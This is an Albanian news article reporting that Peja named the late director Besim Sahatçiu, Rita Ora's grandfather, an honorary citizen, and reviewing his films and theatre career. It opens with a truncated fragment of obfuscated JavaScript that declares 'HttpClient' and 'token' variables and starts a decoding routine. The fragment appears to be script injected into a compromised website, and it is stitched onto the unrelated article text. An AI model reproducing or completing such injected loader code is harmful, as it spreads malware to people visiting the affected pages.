;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Qyteti i Pejës nderon gjyshin e Rita Orës

By

Komuna e Pejës këtë të hënë ka ndarë një mirënjohje për artistin e madh të familjes së Rita Orës.

Të ndjerit Besim Sahatçiu, i është dhënë titulli “Qytetar nderi” nga i pari i komunës, në një ceremoni modeste, ku mirënjohjen e ka pranuar bashkëshortja e tij, Besë Sahatçiu.

Më anë të një postimi në Instagram, reagoi babai i artistes Rita Ora, Besnik Sahatçiu – Ora, duke publikuar disa fotografi nga ceremonia dhe disa të tjera nga e kaluara, të realizuara në Pejë.

View this post on Instagram

A post shared by Besnik Sahatciu Ora (@oranick)

Besim Sahatçiu ishte drejtor i teatrit, filmit dhe televizionit.

Pasi mbaroi gjimnazin në Pejë, Sahatçiu studionte letërsi në Universitetin e Beogradit. Pas ndërprerjes së studimeve për shkak të shërbimit të detyrueshëm ushtarak, ai punoi si përkthyes për disa vjet. Më pas, ai studioi teatrin në Akademinë e Artit Dramatik në Zagreb, Kroaci dhe mbrojti tezën e tij me vënien në skenë të dramës satirike të Gogol, Inspektori i Qeverisë, në Teatrin Provincial Popullor në Prishtinë. Ai ndërroi jetë në vitin 2005.

Sahatçiu drejtoi dhjetëra filma, seriale televizive dhe shfaqje gjatë gjithë karrierës së tij. Si drejtor skenik, ai punoi në Teatrin Kombëtar të Kosovës. Ishte një regjisor e skenarist i njohur i filmave “Përroi vërshues”, “Nabujala reka”, “Trimi”, “Pasqyra”, “Lulepjeshkat e dashurisë” dhe projekteve tjera filmike ndër vite.

“Era dhe lisi” ishte njëri nga super-filmat shqiptar i prodhuar nga Kosovafilmi në vitin 1979 me regji të Besim Sahatçiut. Ndërsa në rolet kryesore ishin dy nga aktorët e mirënjohur, Faruk Begolli dhe Abdurrahman Shala.

Filmi i tij “117” morri çmimin kryesor në Festivalin e Dokumentarit në Beograd në vitin 1978. /Prive.al

Artikuj të ngjashëm